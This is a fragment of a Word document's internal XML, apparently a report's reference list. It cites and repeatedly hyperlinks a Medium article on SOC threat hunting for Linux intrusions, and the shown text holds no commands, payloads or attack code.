          <w:t xml:space="preserve">[15]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Hunting the Hidden: A SOC Analyst’s Guide to Linux Threat Detection 2 ️‍♂️ | by Furkanctiner | Medium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId54">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>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1" Target="media/rId31.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId24" Target="media/rId24.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId54" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId40" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,artifacts.elastic.co" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId37" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,as%20a%20running%20antimalware%20binary" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId48" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,as%20the%20last%20discovery%20command" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId30" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,directly%20revealed%20the%20cloud%20environment" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId29" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,home%2Fitsupport%2Fdebug.sh" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId23" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,line%20will%20contain%20these%20names" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId35" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,part%20of%20the%20attacker%27s%20reconnaissance" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId42" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,path%20to%20the%20cryptominer%20binary" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId44" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,will%20reveal%20the%20archive%20name" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId22" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=After%20initial%20basic%20discovery%2C%20attackers,botnets%20scan%20for%20new%20victims" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId38" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=Detecting%20these%20specialized%20discovery%20commands,use%20process%20tree%20analysis%20to" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId21" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=Imagine%20landing%20in%20an%20unfamiliar,users%2C%20groups%2C%20processes%2C%20and%20network" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId41" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=Press%20enter%20or%20click%20to,view%20image%20in%20full%20size" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId28" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=The%20trick%20for%20us%20is,user%20ID%20in%20that%20context" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId49" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=from%20external%20IPs" TargetMode="External" /></Relationships>
</file>

<file path=word/_rels/footnotes.xml.rels><?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId54" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId40" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,artifacts.elastic.co" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId37" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,as%20a%20running%20antimalware%20binary" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId48" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,as%20the%20last%20discovery%20command" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId30" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,directly%20revealed%20the%20cloud%20environment" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId29" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,home%2Fitsupport%2Fdebug.sh" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId23" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,line%20will%20contain%20these%20names" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId35" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,part%20of%20the%20attacker%27s%20reconnaissance" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId42" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,path%20to%20the%20cryptominer%20binary" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId44" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=,will%20reveal%20the%20archive%20name" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId22" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=After%20initial%20basic%20discovery%2C%20attackers,botnets%20scan%20for%20new%20victims" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId38" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=Detecting%20these%20specialized%20discovery%20commands,use%20process%20tree%20analysis%20to" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId21" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=Imagine%20landing%20in%20an%20unfamiliar,users%2C%20groups%2C%20processes%2C%20and%20network" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId41" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=Press%20enter%20or%20click%20to,view%20image%20in%20full%20size" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId28" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=The%20trick%20for%20us%20is,user%20ID%20in%20that%20context" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId49" Target="https://medium.com/@furkanctiner/hunting-the-hidden-a-soc-analysts-guide-to-linux-threat-detection-2-%EF%B8%8F-%EF%B8%8F-4cf2c549f235#:~:text=from%20external%20IP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2026-05-11T14:10:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-11T14:10:23Z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